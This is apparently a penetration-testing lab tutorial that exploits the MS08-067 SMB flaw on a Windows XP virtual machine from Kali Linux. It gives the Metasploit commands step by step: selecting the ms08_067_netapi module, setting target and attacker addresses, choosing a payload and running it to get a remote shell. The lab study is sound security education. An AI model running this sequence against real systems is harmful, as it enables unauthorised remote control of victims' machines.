Today we will try to exploit Windows XP system using Microsoft Security Bulletin Vulnerability MS08-067. Actually MS08-067 is an issue in netapi.dll file in Windows XP. It allows attacker to use specially crafted RPC request via SMB (Server Message Block) to take control of target. And no authentication is required.

Deliverable:

Lab Set up

• Virtualization using Oracle Virtual box

• Attacker’s System: Kali Linux

• Target System : Windows XP

In Kali Linux --> Terminal

1. Metasploit uses postgresql database to track what user do.

~# service postgresql start (Enter)

2. Starting metasploit

~# service metasploit start (Enter)

Above command creates a postgresql user called 'msf3' and corresponding database. It also starts metaploit's RPC server and web server.

3. Starting msfconsole.

~# msfconsole (Enter)

4. Search for particular exploits i.e. MS08-067.

> search ms08_067_netapi (Enter)

5. Use that exploit.

> use exploit/windows/smb/ms08_067_netapi (Enter)

> show options (Enter)

6. Now set the target’s IP address

> set RHOST [IP address of target] (Enter)

RHOST --> Remote Host (Target)

> show payloads (Enter)

7. Choose and set a payload of your interest. If no payload is set, metasploit takes the default one.

Ex. > set payload [payload name with path] (Enter)

> show options (Enter)

8. Set payload options.

Ex. > set LHOST [IP address of the attacker] (Enter)

Here, the option depends on the payload used.

LHOST --> Local Host (Attacker)

9. Exploit the target.

> exploit (Enter)

10. Thus we get the shell i.e. command prompt of the victim. Now any commands on Windows XP can be performed from Kali Linux.